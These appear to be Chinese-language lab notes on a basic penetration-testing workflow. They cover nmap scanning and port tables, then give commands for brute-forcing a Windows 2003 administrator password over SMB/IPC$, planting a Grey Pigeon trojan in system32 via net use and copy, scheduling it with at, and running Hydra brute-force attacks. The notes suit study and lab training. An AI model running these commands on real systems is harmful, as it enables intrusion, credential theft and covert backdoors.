天天看点

渗透简单测试流程

渗透简单测试流程

0.授权(人为授权)

1.信息收集 nslookup whois

2.扫描漏洞 nmap 扫IP范围 端口

高级扫描:如IIS漏洞2003-IIS6.0 扫描中间件漏洞

扫描网站漏洞

3.漏洞利用

4.提权(shell环境,最高权限)

5.清除数据

6.留后门

实验

win2003:服务器 设置VM2,IP:10.1.1.2/24

winxp:客户机 设置VM2,IP:10.1.1.1/24

1.ping验证是否可以通信。

2.使用xp攻击服务器的445端口(445漏洞利用之一IPC$:)。

1)手工探测端口:客户机telnet 10.1.1.2 445

软件探测:下载scanport 安装包,安装。

2)漏洞利用之IPC$:

NTscan 仅能对445端口进行暴力破解。

3)暴力破解系统密码之445

知识点:net use f: \10.1.1.2\share 密码 /user:用户

#为了客户机可以长期访问,将地址映射到f盘

net use #查看映射列表

net use * /del

net use f: /del

net use f: \10.1.1.2\c$ //密码 /user:用户

net use f: \10.1.1.2\ipc$ //密码 /user:用户

ipc$ :只有共享名,没有共享路径。c$ :C盘

net use \10.1.1.2\ipc$ weizhi /user:administrator

密码未知,暴力破解密码

使用社会工程学字典生成器生成合适范围的密码

*重点:net use \10.1.1.2\ipc$ 密码 /user:administrator

使用net use 映射服务器的所有盘到客户机,即在客户机命令行完全控制对方。

cd

dir \10.1.1.2\share

dir \10.1.1.2\c$

4)制作木马:使用灰鸽子软件生成配置服务程序,保存到本机特定的位置。

5)留后门(植入木马)

cd

copy d:\heihei.exe \10.1.1.2\c$ \windows\system32

#复制软件到服务器的C盘下,copy植入木马

6)设置计划任务,自动执行木马:

net time \10.1.1.2#只有有ipc$,才能查看服务器的时间

at \10.1.1.2 17:00 “c:windows\system32\heihei.exe”#定时执行任务

at \10.1.1.2 #查看执行任务列表

再次输入上个命令,判断是否执行。

7)等待客户机上线。

扫描与爆破

1.扫描概述

人工与工具的结合

主机探测:确定目标主机是否存活

端口扫描:寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统的类型和更详细的信息

2.常见端口

端口号 服务名称

21 FTP

22 SSH(比 Telnet 更安全一点)

23 Telnet

25 SMTP(邮件发送服务)

443 HTTPS

1521 Oracle

3306 MySQL

1433 SQL Server

445 smb(共享文件服务)

3389 rdp(远程桌面服务)

3.Nmap扫描器

重要常用参数

命令 描述

-sP ping 扫描 整个网段

-p 指定端口范围

-sV 服务版本探测

-O(大写) 启用操作系统探测

-A 全面扫描

-oN 保存为 txt

4.基本流程:

Nmap -sP 10.1.1.1/24 扫描网段在线主机 */24为网段参数即扫描10.1.1.X

nmap -O 10.1.1.1 扫描出这个在线服务器的系统版本,和开放端口

nmap -p 21,23,3389 10.1.1.1 扫描主机是否开放指定的端口

nmap -p 21,23,3389 10.1.1.1 -sV 可以查看服务版本

namp -A IP 全面扫描

nmap -oN e:\result.txt 将扫描结果生成扫描报告

5.爆破

).Hydra 九头蛇 爆破工具(要存放文件夹的目录下执行)

Hydra -l 用户名 -p 密码 端口 IP //-p具体的密码

Hydra -L 用户名字典 -P 密码字典 端口 IP //-P密码字典的绝对路径

例:hydra.exe -l administrator -P e:\pass.txt 10.1.1.1 telnet

hydra.exe -l administrator -P e:\pass.txt 10.1.1.1 smb

hydra.exe -L e:\user.txt -P e:\pass.txt 10.1.1.1 telnet

-vV:显示暴力破解的详细过程(linux里效果更好)

实验:

开一台win2003 的虚机,调节网络连接为vmnet1,设置ip:10.1.1.1 subnet:255.255.255.0。

设置本机的网络环境,开启vmnet1,设置ip;10.1.1.100 subnet:255.255.255.0

开启服务器telnet服务,ftp服务,rdp服务。

在本机安装nmap,通过命令行对服务器进行扫描(找到开放服务器和端口)

在本机下载hydra,存放在e盘根目录下。使用命令行执行hydra,找到用户名和密码。

继续阅读